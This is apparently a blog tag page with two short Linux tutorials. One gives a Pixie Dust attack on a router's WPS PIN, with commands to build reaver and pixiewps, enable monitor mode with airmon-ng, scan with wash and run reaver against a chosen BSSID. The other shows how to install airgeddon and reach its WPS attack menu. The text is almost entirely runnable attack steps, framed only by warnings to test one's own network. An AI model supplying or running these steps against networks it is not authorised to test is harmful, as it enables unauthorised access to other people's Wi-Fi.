Skip to content
Home » wps

wps

Visit Tacticalware.com for information related to this tag and others. We look forward to assisting in your tech projects with our in-depth knowledgebase…

Pixie Dust Attacks

Test and Secure YOUR Network Only

Run this from a linux box, against your network. Do not run this against any other network out there. It is easy to find the attacker, it is easy to prosecute the bad actor. Be very careful with this attack.

I would suggest installing Ubuntu, Kali, or ParrotOS and running from a USB drive, connected to your computer or laptop.

Open a termina

sudo bash

apt-get update
apt-get upgrade

apt-get install build-essential
apt-get install libpcap-dev
apt-get install sqlite3
apt-get install libsqlite3-dev
apt-get install pixiewps

git clone https://github.com/t6x/reaver-wps-fork-t6x

cd reaver-wps-fork-t6x/
cd src/
./configure
make
make install

airmon-ng check kill
airmon-ng start wlan1

‘wash -i {monitor-interface}’

Identify your target (YOUR NETWORK ONLY) and note the name, bssid and channel. Make sure the signal is strong

reaver -i wlan1 -b {BSSID of router} -c {router channel} -vvv -K 1 -f

Your attack is now running

How to Install AIRGEDDON

This info is specific to Linux only

Open a terminal

sudo bash

mkdir /tools & cd /tools

git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git

cd airgeddon

ls

sudo bash

./airgeddon.sh

apt-get install and name of tool thats missing

After the dependencies are all installed, run ./airgeddon.sh and begin the configuration

Select your wireless card

Put wireless card into monitoring mode

Select WPS attacks menu – option 8

Select option 4

Select 2.4 ghz